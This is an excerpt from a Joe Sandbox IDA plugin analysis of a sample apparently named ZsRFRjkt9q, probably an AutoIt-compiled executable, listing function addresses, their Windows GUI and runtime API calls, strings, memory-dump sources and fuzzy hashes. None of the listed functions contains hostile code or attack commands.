Opcode ID: 4498dd891bef3c073dae90eee2635492a466a612a2df3ba819a3a2bd57d1623d
Instruction ID: 573796cad2db7ff1302e17eb1794f716ba6f0da4f155cbbcd395141fd52a3640
Opcode Fuzzy Hash: 4498dd891bef3c073dae90eee2635492a466a612a2df3ba819a3a2bd57d1623d
Instruction Fuzzy Hash: BD11BF71A00205AFDB049F94DC88FAFB7B9EF89318F14946FEA4297250D739AE44CB54

Function 0043B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0043B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0043B4DB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d7db90abbb064ebfa12c2c59eb7c57e2b67861bd6856f74568c7db798ce12fec
Instruction ID: 8899dad3a5a672da7911a65e4843f6e45b4eb2c78a03a80d9270399c9af6d800
Opcode Fuzzy Hash: d7db90abbb064ebfa12c2c59eb7c57e2b67861bd6856f74568c7db798ce12fec
Instruction Fuzzy Hash: 9F11367A900218BFDB11DBA9C981F9DBBB4FB08700F204096E604B7290D771AE11DB98

Function 0044732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00447352
MessageBoxW.USER32(?,?,?,?), ref: 00447385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0044739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004473A2

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 8d848b8ac86ef35913a18f1b1a2f46bed8395f8dd1acfa7b340fbcc45a54e7f7
Instruction ID: 65718a7269fcb76229fcf2b12d524195cd6f7c0b01429baa910b87b3e570ebb2
Opcode Fuzzy Hash: 8d848b8ac86ef35913a18f1b1a2f46bed8395f8dd1acfa7b340fbcc45a54e7f7
Instruction Fuzzy Hash: 1911E572A04214ABDB019FAC9C05E9E7BA99B48311F14426AFC21D3291D7748D019BA9

Function 0041D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
GetStockObject.GDI32(00000011), ref: 0041D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 57456f8325da7f8a3214a3def386806872fe646a797bb9acc53fd499b00bb943
Instruction ID: 20e8855dbb7d0dd181b5275668110b09493867f9601d5c4c54c49d70e43e613b
Opcode Fuzzy Hash: 57456f8325da7f8a3214a3def386806872fe646a797bb9acc53fd499b00bb943
Instruction Fuzzy Hash: 4111C4B2901509BFEF125F90DC54EEB7B69FF08364F044116FA0552150C735DCA0DBA4

Function 00434DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00434E16

Part of subcall function 004354F5: __fltout2.LIBCMT ref: 0043551E

__cftog_l.LIBCMT ref: 00434E3C
__cftoe_l.LIBCMT ref: 00434E6E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: e217e9a68c89cc3a703717b2c0a853f5b8c9668b7614545f64a0a403a3b518ad
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: AC014C3200014EBBCF125E84DC028EE3F23BB5C355F589456FE1859135D33AEAB2AB89

Function 00427452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00427A0D: __getptd_noexit.LIBCMT ref: 00427A0E

__lock.LIBCMT ref: 0042748F
InterlockedDecrement.KERNEL32(?), ref: 004274AC
_free.LIBCMT ref: 004274BF
InterlockedIncrement.KERNEL32(00995EC0), ref: 004274D7

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 11e759c0bfa7198342e562279cc5d0a47b4f10d165abb7cdd98db8f1cd51134a
Instruction ID: de51e5ee548e769ed021d111760f6c39ee054f2497822ded0c01ceae259c3d71
Opcode Fuzzy Hash: 11e759c0bfa7198342e562279cc5d0a47b4f10d165abb7cdd98db8f1cd51134a
Instruction Fuzzy Hash: 0D018E31B06631A7C711BF66B80575EBB60BF04714F95411FE81563690C72C6911CBDE

Function 0046EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0041AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041AFE3
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041AFF2
Part of subcall function 0041AF83: BeginPath.GDI32(?), ref: 0041B009
Part of subcall function 0041AF83: SelectObject.GDI32(?,00000000), ref: 0041B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0046EA8E
LineTo.GDI32(00000000,?,?), ref: 0046EA9B
EndPath.GDI32(00000000), ref: 0046EAAB
StrokePath.GDI32(00000000), ref: 0046EAB9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 132eab10170ff87f668f491e9c6a38ef3bc77fac0659604b84b6d5658f4b221e
Instruction ID: 7d6768de46838a1e0420bdc3075050136730bf049448a9ce4948047e77d7b045
Opcode Fuzzy Hash: 132eab10170ff87f668f491e9c6a38ef3bc77fac0659604b84b6d5658f4b221e
Instruction Fuzzy Hash: 9FF0BE31502259BBDB12AF94AC0DFCE3F5AAF06314F044216FA01640F183785562CB9E

Function 0043C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0043C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043C85D
GetCurrentThreadId.KERNEL32 ref: 0043C864
AttachThreadInput.USER32(00000000), ref: 0043C86B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 2f82786ce60a8669e5e91d6cc08f2db72e8021f9279a3ee78326b1a69e8319d0
Instruction ID: be0358667f426e6c30f78aba5f721580d23a9c17b88f7cc5dcbf179fbb72207b
Opcode Fuzzy Hash: 2f82786ce60a8669e5e91d6cc08f2db72e8021f9279a3ee78326b1a69e8319d0
Instruction Fuzzy Hash: 10E0657154222876DB102BA2DC4DEDF7F1CEF157A1F008425B50DA4490D775C581CBE4

Function 0043B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0043B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0043AC9D), ref: 0043B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0043AC9D), ref: 0043B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0043AC9D), ref: 0043B0F1

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 087a434cbdc5e7cbb2fa216e54f86e3f40d69627f63294deb5c65b9fe4df2c89
Instruction ID: d5ae466aed75c77a4d15beb372450120c68d71961851cf8e8349648a48651166
Opcode Fuzzy Hash: 087a434cbdc5e7cbb2fa216e54f86e3f40d69627f63294deb5c65b9fe4df2c89
Instruction Fuzzy Hash: C8E04F32A022119BD7202FB15C0CB4B3BA9EF55795F118C2CA641D6080DA2884018769

Function 0041B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0041B496
SetTextColor.GDI32(?,000000FF), ref: 0041B4A0
SetBkMode.GDI32(?,00000001), ref: 0041B4B5
GetStockObject.GDI32(00000005), ref: 0041B4BD
GetWindowDC.USER32(?,00000000), ref: 0047DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0047DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0047DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0047DE6A
GetPixel.GDI32(00000000,?,?), ref: 0047DE8A
ReleaseDC.USER32(?,00000000), ref: 0047DE95

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 189145e5aca8d1de6ef1204376cf97e8232d643d62abcfa75d3e90a97d7aee34
Instruction ID: ebc7ae97a81ee43cd2b7e44fa5307cd1c78914befb32965c7e0958ce0b8f082e
Opcode Fuzzy Hash: 189145e5aca8d1de6ef1204376cf97e8232d643d62abcfa75d3e90a97d7aee34
Instruction Fuzzy Hash: 50E06D31900240AADF216F74EC0DBDD3B22AF51335F04CA2BF669580E2C3754980CB15

Function 0043B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0043B2DF
746D5030.USERENV(?,?), ref: 0043B2EB
CloseHandle.KERNEL32(?), ref: 0043B2F4
CloseHandle.KERNEL32(?), ref: 0043B2FC

Part of subcall function 0043AB24: GetProcessHeap.KERNEL32(00000000,?,0043A848), ref: 0043AB2B
Part of subcall function 0043AB24: HeapFree.KERNEL32(00000000), ref: 0043AB32

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CloseHandleHeap$D5030FreeObjectProcessSingleWait
String ID:
API String ID: 1757875481-0
Opcode ID: 140da9e2f99dc4dd29c9a508007645021f580a2755418cc36269d399ee6704c3
Instruction ID: a739e54aae2a3a9cd22030b7aca237d8105e1b6acd56b05ad55d5797ed03ab16
Opcode Fuzzy Hash: 140da9e2f99dc4dd29c9a508007645021f580a2755418cc36269d399ee6704c3
Instruction Fuzzy Hash: E7E0BF36505005BBDB013B95DC0885DFB66FF983213108635F615815B1CB32A871EB55

Function 0047B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0047B29A
GetDC.USER32(00000000), ref: 0047B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0047B2C3
ReleaseDC.USER32 ref: 0047B2E2

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ec67915f06b264683b49137b804281f4acd025879a02d45731f49f2f4a66ca92
Instruction ID: ac55191bf5dc09552fbdaeed682a17cbe62f7bb7b12c61747605478ce30e63c9
Opcode Fuzzy Hash: ec67915f06b264683b49137b804281f4acd025879a02d45731f49f2f4a66ca92
Instruction Fuzzy Hash: F0E01AB1901208EFDB016F708848A6D7BA5EB4C354F11C82AF95A97291EA7898418B49

Function 0047B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0047B2AE
GetDC.USER32(00000000), ref: 0047B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0047B2C3
ReleaseDC.USER32 ref: 0047B2E2

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 40d13639704ad495b622b523cbcbeb9e56c1aabbfad60d149bac482c6001f4f6
Instruction ID: 1d14186068ba132644a7ce174cc16f4ac5b7c4f797403fb1499130b6af5a5e45
Opcode Fuzzy Hash: 40d13639704ad495b622b523cbcbeb9e56c1aabbfad60d149bac482c6001f4f6
Instruction Fuzzy Hash: DDE04FB1900204EFDB006F70C84866D7BA5FB4C354F11882EF95AD7290EB7898418B48

Function 0043DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0043DEAA

Strings

AutoIt3GUI, xrefs: 0043DE22
Container, xrefs: 0043DE29

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: ca8847fd1ad060e74e2d1c31adcd40419983daa2a2df24dd84348ac0e8a226e4
Instruction ID: 91fc25d46138a869cd882b063abef7fe39734953fcc036a09f511b7d2fb85e7c
Opcode Fuzzy Hash: ca8847fd1ad060e74e2d1c31adcd40419983daa2a2df24dd84348ac0e8a226e4
Instruction Fuzzy Hash: 61914B70A006019FDB14DF64D884B6ABBF5FF49714F20846EF84ACB291DB78E841CB68

Function 0044290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00442A72

Strings

I/G, xrefs: 004429FC, 00442A64, 00442A12
I/G, xrefs: 0044297F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _wcscpy
String ID: I/G$I/G
API String ID: 3048848545-4201233942
Opcode ID: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
Instruction ID: 5b5fadca2aca936165ba25b9bf37a07b386b53b8396f083847d400d46c1348b3
Opcode Fuzzy Hash: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
Instruction Fuzzy Hash: 9D41F771A00216AAEF24DF85D5419FEB770EF48314F90405BF881B7291DBB89E82C7AC

Function 0041BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0041BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0041BCF3

Strings

@, xrefs: 0041BCE8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 18e4b89ca3cec7a56c612a8f29846d5dfa5d21973cb2bc6782e476a67999c819
Instruction ID: 7d63771c9e25ddf9183b65e02125f6951521e015d12a80f1151a29abe9b9713c
Opcode Fuzzy Hash: 18e4b89ca3cec7a56c612a8f29846d5dfa5d21973cb2bc6782e476a67999c819
Instruction Fuzzy Hash: AC515B715087449BE320AF15DC85BAFBBECFF94358F414C5EF1C8810A2EBB485A9875A

Function 0044C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 004044ED: __fread_nolock.LIBCMT ref: 0040450B

_wcscmp.LIBCMT ref: 0044C65D
_wcscmp.LIBCMT ref: 0044C670

Strings

FILE, xrefs: 0044C5A5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: dcc397aec440af2ad813aa0669c94931f0cf7e601968377577617a591bb2fdd1
Instruction ID: d6fd1d98c24f378f3689914d9611b9600f4530d8b2fd317d4f5c4972b7240fa3
Opcode Fuzzy Hash: dcc397aec440af2ad813aa0669c94931f0cf7e601968377577617a591bb2fdd1
Instruction Fuzzy Hash: 3241F972A0021ABBDF109AA5DC81FEF77B9DF89704F00407AF605FB181D6789A04C769

Function 0046A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0046A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0046A86F

Strings

', xrefs: 0046A7C3

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 1ce9c5eab0d880a096e178a50c728c1281ac5d3fcda1428f2d726b8c76c426d8
Instruction ID: 05b9b359a9089e5631400059deb0dd6c5e581389fb3afd8405a1aacd88250687
Opcode Fuzzy Hash: 1ce9c5eab0d880a096e178a50c728c1281ac5d3fcda1428f2d726b8c76c426d8
Instruction Fuzzy Hash: 17410A74E017099FDB54DF64C880BDABBB5FF09304F10016AE905AB351E774A952CF96

Function 0046975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0046980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0046984A

Strings

static, xrefs: 004697AA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$DestroyMove
